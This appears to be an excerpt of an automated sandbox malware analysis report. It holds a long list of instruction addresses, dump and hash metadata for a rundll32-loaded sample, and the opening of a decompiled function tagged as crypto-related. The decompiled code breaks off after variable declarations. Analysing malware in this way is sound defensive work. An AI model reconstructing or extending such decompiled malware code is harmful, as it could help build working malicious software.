                                                                                                                          0x007a2675
                                                                                                                          0x007a2680
                                                                                                                          0x007a268c
                                                                                                                          0x007a2691
                                                                                                                          0x007a2697
                                                                                                                          0x007a269f
                                                                                                                          0x007a26a7
                                                                                                                          0x007a26af
                                                                                                                          0x007a26b7
                                                                                                                          0x007a26bf
                                                                                                                          0x007a26cb
                                                                                                                          0x007a26ce
                                                                                                                          0x007a26d2
                                                                                                                          0x007a26da
                                                                                                                          0x007a26e2
                                                                                                                          0x007a26e7
                                                                                                                          0x007a26ef
                                                                                                                          0x007a26f4
                                                                                                                          0x007a26fc
                                                                                                                          0x007a2704
                                                                                                                          0x007a2711
                                                                                                                          0x007a2715
                                                                                                                          0x007a271d
                                                                                                                          0x007a2725
                                                                                                                          0x007a2730
                                                                                                                          0x007a2738
                                                                                                                          0x007a274b
                                                                                                                          0x007a2752
                                                                                                                          0x007a275d
                                                                                                                          0x007a2768
                                                                                                                          0x007a2770
                                                                                                                          0x007a2778
                                                                                                                          0x007a2780
                                                                                                                          0x007a278b
                                                                                                                          0x007a2793
                                                                                                                          0x007a279d
                                                                                                                          0x007a27a2
                                                                                                                          0x007a27a7
                                                                                                                          0x007a27af
                                                                                                                          0x007a27b7
                                                                                                                          0x007a27bc
                                                                                                                          0x007a27c4
                                                                                                                          0x007a27cc
                                                                                                                          0x007a27d4
                                                                                                                          0x007a27e9
                                                                                                                          0x007a27ec
                                                                                                                          0x007a27ed
                                                                                                                          0x007a27fe
                                                                                                                          0x007a2805
                                                                                                                          0x007a2810
                                                                                                                          0x007a281b
                                                                                                                          0x007a2826
                                                                                                                          0x007a2831
                                                                                                                          0x007a283c
                                                                                                                          0x007a2847
                                                                                                                          0x007a2852
                                                                                                                          0x007a285d
                                                                                                                          0x007a2865
                                                                                                                          0x007a2870
                                                                                                                          0x007a287b
                                                                                                                          0x007a2886
                                                                                                                          0x007a2891
                                                                                                                          0x007a289c
                                                                                                                          0x007a28a4
                                                                                                                          0x007a28ac
                                                                                                                          0x007a28bc
                                                                                                                          0x007a28c0
                                                                                                                          0x007a28c8
                                                                                                                          0x007a28d8
                                                                                                                          0x007a28dc
                                                                                                                          0x007a28e4
                                                                                                                          0x007a28ec
                                                                                                                          0x007a28f4
                                                                                                                          0x007a28fc
                                                                                                                          0x007a2901
                                                                                                                          0x007a2906
                                                                                                                          0x007a290e
                                                                                                                          0x007a2916
                                                                                                                          0x007a2928
                                                                                                                          0x007a292d
                                                                                                                          0x007a2936
                                                                                                                          0x007a2941
                                                                                                                          0x007a294c
                                                                                                                          0x007a295f
                                                                                                                          0x007a2960
                                                                                                                          0x007a2967
                                                                                                                          0x007a2972
                                                                                                                          0x007a2985
                                                                                                                          0x007a298c
                                                                                                                          0x007a2997
                                                                                                                          0x007a29ab
                                                                                                                          0x007a29b2
                                                                                                                          0x007a29ba
                                                                                                                          0x007a29c5
                                                                                                                          0x007a29d0
                                                                                                                          0x007a29e7
                                                                                                                          0x007a29ea
                                                                                                                          0x007a29f1
                                                                                                                          0x007a29fc
                                                                                                                          0x007a2a07
                                                                                                                          0x007a2a12
                                                                                                                          0x007a2a1d
                                                                                                                          0x007a2a28
                                                                                                                          0x007a2a33
                                                                                                                          0x007a2a3b
                                                                                                                          0x007a2a46
                                                                                                                          0x007a2a51
                                                                                                                          0x007a2a64
                                                                                                                          0x007a2a6b
                                                                                                                          0x007a2a72
                                                                                                                          0x007a2a7d
                                                                                                                          0x007a2a93
                                                                                                                          0x007a2a9a
                                                                                                                          0x007a2aa5
                                                                                                                          0x007a2ab8
                                                                                                                          0x007a2abb
                                                                                                                          0x007a2ac2
                                                                                                                          0x007a2aca
                                                                                                                          0x007a2ad5
                                                                                                                          0x007a2add
                                                                                                                          0x007a2ae2
                                                                                                                          0x007a2aea
                                                                                                                          0x007a2af2
                                                                                                                          0x007a2b05
                                                                                                                          0x007a2b0c
                                                                                                                          0x007a2b17
                                                                                                                          0x007a2b1f
                                                                                                                          0x007a2b2a
                                                                                                                          0x007a2b35
                                                                                                                          0x007a2b3d
                                                                                                                          0x007a2b48
                                                                                                                          0x007a2b53
                                                                                                                          0x007a2b5a
                                                                                                                          0x007a2b65
                                                                                                                          0x007a2b70
                                                                                                                          0x007a2b83
                                                                                                                          0x007a2b8a
                                                                                                                          0x007a2ba0
                                                                                                                          0x007a2ba7
                                                                                                                          0x007a2bb2
                                                                                                                          0x007a2bba
                                                                                                                          0x007a2bc2
                                                                                                                          0x007a2bca
                                                                                                                          0x007a2bcf
                                                                                                                          0x007a2bd7
                                                                                                                          0x007a2bea
                                                                                                                          0x007a2beb
                                                                                                                          0x007a2bfa
                                                                                                                          0x007a2c01
                                                                                                                          0x007a2c08
                                                                                                                          0x007a2c13
                                                                                                                          0x007a2c1e
                                                                                                                          0x007a2c26
                                                                                                                          0x007a2c31
                                                                                                                          0x007a2c3c
                                                                                                                          0x007a2c47
                                                                                                                          0x007a2c58
                                                                                                                          0x007a2c5f
                                                                                                                          0x007a2c6c
                                                                                                                          0x007a2c74
                                                                                                                          0x007a2c7c
                                                                                                                          0x007a2c86
                                                                                                                          0x007a2c8b
                                                                                                                          0x007a2c91
                                                                                                                          0x007a2c99
                                                                                                                          0x007a2ca4
                                                                                                                          0x007a2caf
                                                                                                                          0x007a2cba
                                                                                                                          0x007a2ccd
                                                                                                                          0x007a2cce
                                                                                                                          0x007a2cd5
                                                                                                                          0x007a2ce0
                                                                                                                          0x007a2cf3
                                                                                                                          0x007a2cfa
                                                                                                                          0x007a2d05
                                                                                                                          0x007a2d10
                                                                                                                          0x007a2d1e
                                                                                                                          0x007a2d22
                                                                                                                          0x007a2d2a
                                                                                                                          0x007a2d2f
                                                                                                                          0x007a2d37
                                                                                                                          0x007a2d42
                                                                                                                          0x007a2d4a
                                                                                                                          0x007a2d55
                                                                                                                          0x007a2d5d
                                                                                                                          0x007a2d62
                                                                                                                          0x007a2d67
                                                                                                                          0x007a2d6f
                                                                                                                          0x007a2d77
                                                                                                                          0x007a2d82
                                                                                                                          0x007a2d8d
                                                                                                                          0x007a2d98
                                                                                                                          0x007a2da3
                                                                                                                          0x007a2dab
                                                                                                                          0x007a2db3
                                                                                                                          0x007a2dbc
                                                                                                                          0x007a2dc0
                                                                                                                          0x007a2dc8
                                                                                                                          0x007a2dd3
                                                                                                                          0x007a2dde
                                                                                                                          0x007a2de9
                                                                                                                          0x007a2df4
                                                                                                                          0x007a2dff
                                                                                                                          0x007a2e0a
                                                                                                                          0x007a2e12
                                                                                                                          0x007a2e1c
                                                                                                                          0x007a2e20
                                                                                                                          0x007a2e28
                                                                                                                          0x007a2e30
                                                                                                                          0x007a2e3b
                                                                                                                          0x007a2e46
                                                                                                                          0x007a2e51
                                                                                                                          0x007a2e58
                                                                                                                          0x007a2e63
                                                                                                                          0x007a2e6e
                                                                                                                          0x007a2e79
                                                                                                                          0x007a2e84
                                                                                                                          0x007a2e8f
                                                                                                                          0x007a2e9a
                                                                                                                          0x007a2ea5
                                                                                                                          0x007a2eb0
                                                                                                                          0x007a2ebb
                                                                                                                          0x007a2ec6
                                                                                                                          0x007a2ed1
                                                                                                                          0x007a2edc
                                                                                                                          0x007a2eef
                                                                                                                          0x007a2f02
                                                                                                                          0x007a2f05
                                                                                                                          0x007a2f0c
                                                                                                                          0x007a2f17
                                                                                                                          0x007a2f22
                                                                                                                          0x007a2f2d
                                                                                                                          0x007a2f38
                                                                                                                          0x007a2f4e
                                                                                                                          0x007a2f55
                                                                                                                          0x007a2f60
                                                                                                                          0x007a2f6b
                                                                                                                          0x007a2f76
                                                                                                                          0x007a2f81
                                                                                                                          0x007a2f8c
                                                                                                                          0x007a2f97
                                                                                                                          0x007a2fa9
                                                                                                                          0x007a2fae
                                                                                                                          0x007a2fb7
                                                                                                                          0x007a2fc2
                                                                                                                          0x007a2fcd
                                                                                                                          0x007a2fd8
                                                                                                                          0x007a2fe3
                                                                                                                          0x007a2fee
                                                                                                                          0x007a2ff9
                                                                                                                          0x007a3001
                                                                                                                          0x007a3009
                                                                                                                          0x007a3011
                                                                                                                          0x007a301c
                                                                                                                          0x007a3027
                                                                                                                          0x007a3032
                                                                                                                          0x007a303d
                                                                                                                          0x007a304f
                                                                                                                          0x007a3054
                                                                                                                          0x007a305d
                                                                                                                          0x007a3068
                                                                                                                          0x007a3070
                                                                                                                          0x007a3078
                                                                                                                          0x007a3080
                                                                                                                          0x007a3088
                                                                                                                          0x007a3090
                                                                                                                          0x007a3098
                                                                                                                          0x007a30a1
                                                                                                                          0x007a30a4
                                                                                                                          0x007a30a8
                                                                                                                          0x007a30b0
                                                                                                                          0x007a30b8
                                                                                                                          0x007a30c3
                                                                                                                          0x007a30ce
                                                                                                                          0x007a30d9
                                                                                                                          0x007a30e4
                                                                                                                          0x007a30ef
                                                                                                                          0x007a30fa
                                                                                                                          0x007a3102
                                                                                                                          0x007a310a
                                                                                                                          0x007a3115
                                                                                                                          0x007a3120
                                                                                                                          0x007a312b
                                                                                                                          0x007a3136
                                                                                                                          0x007a3141
                                                                                                                          0x007a314c
                                                                                                                          0x007a3157
                                                                                                                          0x007a3162
                                                                                                                          0x007a316d
                                                                                                                          0x007a3178
                                                                                                                          0x007a3185
                                                                                                                          0x007a318d
                                                                                                                          0x007a3198
                                                                                                                          0x007a31a0
                                                                                                                          0x007a31a5
                                                                                                                          0x007a31aa
                                                                                                                          0x007a31af
                                                                                                                          0x007a31b7
                                                                                                                          0x007a31c7
                                                                                                                          0x007a31cb
                                                                                                                          0x007a31d0
                                                                                                                          0x007a31d5
                                                                                                                          0x007a31dd
                                                                                                                          0x007a31e8
                                                                                                                          0x007a31f3
                                                                                                                          0x007a31fb
                                                                                                                          0x007a3206
                                                                                                                          0x007a3211
                                                                                                                          0x007a321c
                                                                                                                          0x007a3227
                                                                                                                          0x007a323c
                                                                                                                          0x007a323f
                                                                                                                          0x007a3251
                                                                                                                          0x007a3258
                                                                                                                          0x007a3263
                                                                                                                          0x007a326e
                                                                                                                          0x007a3276
                                                                                                                          0x007a3281
                                                                                                                          0x007a3289
                                                                                                                          0x007a3291
                                                                                                                          0x007a3296
                                                                                                                          0x007a329e
                                                                                                                          0x007a32a6
                                                                                                                          0x007a32b1
                                                                                                                          0x007a32b9
                                                                                                                          0x007a32c4
                                                                                                                          0x007a32cf
                                                                                                                          0x007a32d7
                                                                                                                          0x007a32df
                                                                                                                          0x007a32e7
                                                                                                                          0x007a32eb
                                                                                                                          0x007a32f3
                                                                                                                          0x007a3306
                                                                                                                          0x007a330d
                                                                                                                          0x007a3318
                                                                                                                          0x007a3323
                                                                                                                          0x007a332e
                                                                                                                          0x007a3339
                                                                                                                          0x007a3344
                                                                                                                          0x007a335a
                                                                                                                          0x007a3369
                                                                                                                          0x007a336a
                                                                                                                          0x007a3371
                                                                                                                          0x007a3379
                                                                                                                          0x007a3384
                                                                                                                          0x007a338f
                                                                                                                          0x007a33a0
                                                                                                                          0x007a33a7
                                                                                                                          0x007a33b2
                                                                                                                          0x007a33bd
                                                                                                                          0x007a33c8
                                                                                                                          0x007a33d3
                                                                                                                          0x007a33db
                                                                                                                          0x007a33e6
                                                                                                                          0x007a33fc
                                                                                                                          0x007a3401
                                                                                                                          0x007a3412
                                                                                                                          0x007a3415
                                                                                                                          0x007a341c
                                                                                                                          0x007a3427
                                                                                                                          0x007a3432
                                                                                                                          0x007a343a
                                                                                                                          0x007a3445
                                                                                                                          0x007a3450
                                                                                                                          0x007a345b
                                                                                                                          0x007a3466
                                                                                                                          0x007a3471
                                                                                                                          0x007a3479
                                                                                                                          0x007a3484
                                                                                                                          0x007a348f
                                                                                                                          0x007a34a2
                                                                                                                          0x007a34a9
                                                                                                                          0x007a34b4
                                                                                                                          0x007a34bf
                                                                                                                          0x007a34ca
                                                                                                                          0x007a34d5
                                                                                                                          0x007a34dd
                                                                                                                          0x007a34e5
                                                                                                                          0x007a34ed
                                                                                                                          0x007a34f8
                                                                                                                          0x007a3503
                                                                                                                          0x007a350e
                                                                                                                          0x007a3519
                                                                                                                          0x007a352f
                                                                                                                          0x007a3536
                                                                                                                          0x007a3541
                                                                                                                          0x007a354c
                                                                                                                          0x007a355b
                                                                                                                          0x007a3560
                                                                                                                          0x007a3569
                                                                                                                          0x007a3574
                                                                                                                          0x007a357f
                                                                                                                          0x007a3591
                                                                                                                          0x007a3596
                                                                                                                          0x007a359f
                                                                                                                          0x007a35b1
                                                                                                                          0x007a35b4
                                                                                                                          0x007a35bb
                                                                                                                          0x007a35c6
                                                                                                                          0x007a35d1
                                                                                                                          0x007a35dc
                                                                                                                          0x007a35e7
                                                                                                                          0x007a35ef
                                                                                                                          0x007a35fa
                                                                                                                          0x007a3605
                                                                                                                          0x007a3615
                                                                                                                          0x007a361c
                                                                                                                          0x007a3627
                                                                                                                          0x007a3632
                                                                                                                          0x007a363d
                                                                                                                          0x007a3648
                                                                                                                          0x007a3653
                                                                                                                          0x007a365d
                                                                                                                          0x007a3669
                                                                                                                          0x007a366c
                                                                                                                          0x007a3673
                                                                                                                          0x007a3677
                                                                                                                          0x007a367f
                                                                                                                          0x007a3687
                                                                                                                          0x007a368f
                                                                                                                          0x007a369c
                                                                                                                          0x007a36a3
                                                                                                                          0x007a36a7
                                                                                                                          0x007a36b4
                                                                                                                          0x007a36b8
                                                                                                                          0x007a36c0
                                                                                                                          0x007a36cb
                                                                                                                          0x007a36d3
                                                                                                                          0x007a36de
                                                                                                                          0x007a36e9
                                                                                                                          0x007a36f1
                                                                                                                          0x007a36fc
                                                                                                                          0x007a370f
                                                                                                                          0x007a3710
                                                                                                                          0x007a3717
                                                                                                                          0x007a3722
                                                                                                                          0x007a372a
                                                                                                                          0x007a3732
                                                                                                                          0x007a373a
                                                                                                                          0x007a3742
                                                                                                                          0x007a374a
                                                                                                                          0x007a3752
                                                                                                                          0x007a3760
                                                                                                                          0x007a3769
                                                                                                                          0x007a376d
                                                                                                                          0x007a376d
                                                                                                                          0x007a3775
                                                                                                                          0x007a3775
                                                                                                                          0x007a3775
                                                                                                                          0x007a3775
                                                                                                                          0x007a377b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3781
                                                                                                                          0x007a3c04
                                                                                                                          0x007a3c09
                                                                                                                          0x00000000
                                                                                                                          0x007a3c09
                                                                                                                          0x007a3787
                                                                                                                          0x007a378d
                                                                                                                          0x007a3a80
                                                                                                                          0x007a3a86
                                                                                                                          0x007a3b54
                                                                                                                          0x007a3b5a
                                                                                                                          0x007a3bde
                                                                                                                          0x007a3be3
                                                                                                                          0x007a3be5
                                                                                                                          0x007a3bf6
                                                                                                                          0x007a3bf6
                                                                                                                          0x007a3a28
                                                                                                                          0x007a3a28
                                                                                                                          0x00000000
                                                                                                                          0x007a3a28
                                                                                                                          0x007a3b5c
                                                                                                                          0x007a3b62
                                                                                                                          0x007a3baf
                                                                                                                          0x007a3bbb
                                                                                                                          0x007a3bc4
                                                                                                                          0x007a3bcc
                                                                                                                          0x00000000
                                                                                                                          0x007a3bcc
                                                                                                                          0x007a3b64
                                                                                                                          0x007a3b6a
                                                                                                                          0x007a3ba1
                                                                                                                          0x00000000
                                                                                                                          0x007a3ba1
                                                                                                                          0x007a3b6c
                                                                                                                          0x007a3b6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3b90
                                                                                                                          0x007a3b97
                                                                                                                          0x00000000
                                                                                                                          0x007a3b97
                                                                                                                          0x007a3a8c
                                                                                                                          0x007a3b3d
                                                                                                                          0x007a3b42
                                                                                                                          0x007a3b44
                                                                                                                          0x007a4009
                                                                                                                          0x007a4010
                                                                                                                          0x007a4010
                                                                                                                          0x007a3b4a
                                                                                                                          0x00000000
                                                                                                                          0x007a3b4a
                                                                                                                          0x007a3a92
                                                                                                                          0x007a3a98
                                                                                                                          0x007a3b0f
                                                                                                                          0x007a3b21
                                                                                                                          0x007a3b27
                                                                                                                          0x007a3b28
                                                                                                                          0x007a3b2f
                                                                                                                          0x00000000
                                                                                                                          0x007a3b2f
                                                                                                                          0x007a3a9a
                                                                                                                          0x007a3aa0
                                                                                                                          0x007a3ae5
                                                                                                                          0x007a3aec
                                                                                                                          0x007a3af1
                                                                                                                          0x00000000
                                                                                                                          0x007a3af1
                                                                                                                          0x007a3aa2
                                                                                                                          0x007a3aa8
                                                                                                                          0x007a3ad6
                                                                                                                          0x007a3adb
                                                                                                                          0x00000000
                                                                                                                          0x007a3adb
                                                                                                                          0x007a3aaa
                                                                                                                          0x007a3ab0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3ab6
                                                                                                                          0x007a3abd
                                                                                                                          0x007a3abf
                                                                                                                          0x00000000
                                                                                                                          0x007a3abf
                                                                                                                          0x007a3793
                                                                                                                          0x007a3a70
                                                                                                                          0x007a3a75
                                                                                                                          0x007a3a76
                                                                                                                          0x00000000
                                                                                                                          0x007a3a76
                                                                                                                          0x007a3799
                                                                                                                          0x007a379f
                                                                                                                          0x007a38e1
                                                                                                                          0x007a38e7
                                                                                                                          0x007a39f9
                                                                                                                          0x007a3a00
                                                                                                                          0x007a3a02
                                                                                                                          0x007a3a32
                                                                                                                          0x007a3a39
                                                                                                                          0x007a3a3c
                                                                                                                          0x007a3a48
                                                                                                                          0x007a3a4a
                                                                                                                          0x007a3a51
                                                                                                                          0x007a3a51
                                                                                                                          0x00000000
                                                                                                                          0x007a3a51
                                                                                                                          0x007a3a4c
                                                                                                                          0x007a3a4f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3a4f
                                                                                                                          0x007a3a3e
                                                                                                                          0x00000000
                                                                                                                          0x007a3a3e
                                                                                                                          0x007a3a1d
                                                                                                                          0x007a3a23
                                                                                                                          0x007a3a24
                                                                                                                          0x007a3a26
                                                                                                                          0x00000000
                                                                                                                          0x007a3a26
                                                                                                                          0x007a38ed
                                                                                                                          0x007a38f3
                                                                                                                          0x007a3fd7
                                                                                                                          0x00000000
                                                                                                                          0x007a3fdc
                                                                                                                          0x007a38f9
                                                                                                                          0x007a38ff
                                                                                                                          0x007a3959
                                                                                                                          0x007a3965
                                                                                                                          0x007a398e
                                                                                                                          0x007a3995
                                                                                                                          0x007a399a
                                                                                                                          0x007a39b7
                                                                                                                          0x007a39bd
                                                                                                                          0x007a39d5
                                                                                                                          0x00000000
                                                                                                                          0x007a39da
                                                                                                                          0x007a3901
                                                                                                                          0x007a3907
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3914
                                                                                                                          0x007a3919
                                                                                                                          0x00000000
                                                                                                                          0x007a3919
                                                                                                                          0x007a37a5
                                                                                                                          0x007a3895
                                                                                                                          0x007a389a
                                                                                                                          0x007a389c
                                                                                                                          0x007a38c5
                                                                                                                          0x007a38ce
                                                                                                                          0x007a38d6
                                                                                                                          0x007a389e
                                                                                                                          0x007a38a2
                                                                                                                          0x007a38ab
                                                                                                                          0x007a38b3
                                                                                                                          0x007a38b3
                                                                                                                          0x00000000
                                                                                                                          0x007a389c
                                                                                                                          0x007a37b1
                                                                                                                          0x007a3881
                                                                                                                          0x007a3887
                                                                                                                          0x00000000
                                                                                                                          0x007a3887
                                                                                                                          0x007a37bd
                                                                                                                          0x007a3850
                                                                                                                          0x007a3855
                                                                                                                          0x007a385c
                                                                                                                          0x007a3864
                                                                                                                          0x00000000
                                                                                                                          0x007a3864
                                                                                                                          0x007a37c5
                                                                                                                          0x007a37f6
                                                                                                                          0x007a37fb
                                                                                                                          0x007a3802
                                                                                                                          0x00000000
                                                                                                                          0x007a3802
                                                                                                                          0x007a37cd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a37de
                                                                                                                          0x007a37e5
                                                                                                                          0x00000000
                                                                                                                          0x007a37eb
                                                                                                                          0x007a37eb
                                                                                                                          0x00000000
                                                                                                                          0x007a37eb
                                                                                                                          0x007a37e5
                                                                                                                          0x007a3c13
                                                                                                                          0x007a3c19
                                                                                                                          0x007a3e40
                                                                                                                          0x007a3e46
                                                                                                                          0x007a3edd
                                                                                                                          0x007a3ee3
                                                                                                                          0x007a3f9b
                                                                                                                          0x007a3fa0
                                                                                                                          0x007a3fa2
                                                                                                                          0x007a3e13
                                                                                                                          0x007a3e13
                                                                                                                          0x00000000
                                                                                                                          0x007a3e13
                                                                                                                          0x007a3fa8
                                                                                                                          0x00000000
                                                                                                                          0x007a3fa8
                                                                                                                          0x007a3ee9
                                                                                                                          0x007a3eef
                                                                                                                          0x007a3f21
                                                                                                                          0x007a3f28
                                                                                                                          0x007a3f89
                                                                                                                          0x007a3f89
                                                                                                                          0x00000000
                                                                                                                          0x007a3f89
                                                                                                                          0x007a3f38
                                                                                                                          0x007a3f54
                                                                                                                          0x007a3f5b
                                                                                                                          0x007a3f60
                                                                                                                          0x007a3f63
                                                                                                                          0x007a3f6a
                                                                                                                          0x007a3f84
                                                                                                                          0x00000000
                                                                                                                          0x007a3f84
                                                                                                                          0x007a3f6c
                                                                                                                          0x00000000
                                                                                                                          0x007a3f6c
                                                                                                                          0x007a3ef1
                                                                                                                          0x007a3ef7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3f0b
                                                                                                                          0x007a3f10
                                                                                                                          0x007a3f17
                                                                                                                          0x00000000
                                                                                                                          0x007a3f17
                                                                                                                          0x007a3e4c
                                                                                                                          0x007a3ec6
                                                                                                                          0x007a3ecb
                                                                                                                          0x007a3ecd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3ed3
                                                                                                                          0x00000000
                                                                                                                          0x007a3ed3
                                                                                                                          0x007a3e4e
                                                                                                                          0x007a3e54
                                                                                                                          0x007a3ea9
                                                                                                                          0x007a3eae
                                                                                                                          0x00000000
                                                                                                                          0x007a3eae
                                                                                                                          0x007a3e56
                                                                                                                          0x007a3e5c
                                                                                                                          0x007a4004
                                                                                                                          0x00000000
                                                                                                                          0x007a4004
                                                                                                                          0x007a3e62
                                                                                                                          0x007a3e68
                                                                                                                          0x007a3e93
                                                                                                                          0x007a3e98
                                                                                                                          0x00000000
                                                                                                                          0x007a3e98
                                                                                                                          0x007a3e6a
                                                                                                                          0x007a3e70
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3e7d
                                                                                                                          0x007a3e82
                                                                                                                          0x00000000
                                                                                                                          0x007a3e82
                                                                                                                          0x007a3c1f
                                                                                                                          0x007a3e24
                                                                                                                          0x007a3e2d
                                                                                                                          0x007a3e35
                                                                                                                          0x00000000
                                                                                                                          0x007a3e35
                                                                                                                          0x007a3c25
                                                                                                                          0x007a3c2b
                                                                                                                          0x007a3d2d
                                                                                                                          0x007a3d33
                                                                                                                          0x007a3e0e
                                                                                                                          0x00000000
                                                                                                                          0x007a3e0e
                                                                                                                          0x007a3d39
                                                                                                                          0x007a3d3f
                                                                                                                          0x007a3fef
                                                                                                                          0x00000000
                                                                                                                          0x007a3fef
                                                                                                                          0x007a3d45
                                                                                                                          0x007a3d4b
                                                                                                                          0x007a3d8c
                                                                                                                          0x007a3d91
                                                                                                                          0x007a3d92
                                                                                                                          0x007a3d94
                                                                                                                          0x007a3d9c
                                                                                                                          0x007a3da3
                                                                                                                          0x007a3da5
                                                                                                                          0x007a3dc3
                                                                                                                          0x007a3dc5
                                                                                                                          0x007a3dcc
                                                                                                                          0x007a3dcc
                                                                                                                          0x007a3dcd
                                                                                                                          0x007a3dd0
                                                                                                                          0x007a3deb
                                                                                                                          0x007a3df1
                                                                                                                          0x007a3df2
                                                                                                                          0x007a3df2
                                                                                                                          0x007a3d96
                                                                                                                          0x007a3d96
                                                                                                                          0x007a3d96
                                                                                                                          0x007a3df4
                                                                                                                          0x007a3df6
                                                                                                                          0x00000000
                                                                                                                          0x007a3df6
                                                                                                                          0x007a3d4d
                                                                                                                          0x007a3d53
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3d60
                                                                                                                          0x007a3d65
                                                                                                                          0x007a3d6c
                                                                                                                          0x00000000
                                                                                                                          0x007a3d6c
                                                                                                                          0x007a3c31
                                                                                                                          0x007a3d16
                                                                                                                          0x007a3d1b
                                                                                                                          0x007a3d1d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3d23
                                                                                                                          0x00000000
                                                                                                                          0x007a3d23
                                                                                                                          0x007a3c37
                                                                                                                          0x007a3c3d
                                                                                                                          0x007a3ce0
                                                                                                                          0x007a3cef
                                                                                                                          0x007a3cf4
                                                                                                                          0x007a3cfb
                                                                                                                          0x007a3d03
                                                                                                                          0x00000000
                                                                                                                          0x007a3d03
                                                                                                                          0x007a3c43
                                                                                                                          0x007a3c49
                                                                                                                          0x007a3c9e
                                                                                                                          0x007a3caa
                                                                                                                          0x007a3cbe
                                                                                                                          0x007a3cc4
                                                                                                                          0x00000000
                                                                                                                          0x007a3cc4
                                                                                                                          0x007a3c4b
                                                                                                                          0x007a3c51
                                                                                                                          0x007a3c81
                                                                                                                          0x007a3c86
                                                                                                                          0x00000000
                                                                                                                          0x007a3c86
                                                                                                                          0x007a3c53
                                                                                                                          0x007a3c59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3c63
                                                                                                                          0x007a3c68
                                                                                                                          0x007a3c6a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3c70
                                                                                                                          0x00000000
                                                                                                                          0x007a3fad
                                                                                                                          0x007a3fad
                                                                                                                          0x007a3fad
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                          • API String ID: 0-2742041174
                                                                                                                          • Opcode ID: b030cfe2e4e31aabf6ae55016cd30a8e2273e9e0ced223e62aac66ec3c676f22
                                                                                                                          • Instruction ID: 8bc3741587ab14aa21604509c7ebe3d2b0f049a36d1bb9320c65522749dd8d87
                                                                                                                          • Opcode Fuzzy Hash: b030cfe2e4e31aabf6ae55016cd30a8e2273e9e0ced223e62aac66ec3c676f22
                                                                                                                          • Instruction Fuzzy Hash: 87C2F271509380CBD378DF25C58AACBBBE1BBC5314F108A1DE5DA9A260DBB59948CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00792BD9 Relevance: 19.4, Strings: 15, Instructions: 636COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E00792BD9(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				void* _t716;
				void* _t717;
				void* _t718;
				intOrPtr _t730;
				intOrPtr _t732;
				void* _t733;
				signed int _t735;
				void* _t741;
				intOrPtr _t746;
				intOrPtr _t752;
				intOrPtr _t754;
				intOrPtr _t755;
				void* _t757;
				void* _t759;
				intOrPtr _t760;
				void* _t766;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				void* _t783;
				intOrPtr _t792;
				void* _t807;
				void* _t812;
				void* _t842;
				intOrPtr _t848;
				void* _t864;
				intOrPtr _t866;
				signed int _t867;
				void* _t868;
				void* _t873;
				signed int* _t875;
				void* _t878;

				_t875 =  &_v396;
				_v56 = 0xa0cd19;
				_t873 = 0;
				_v84 = __ecx;
				_v52 = _v52 & 0;
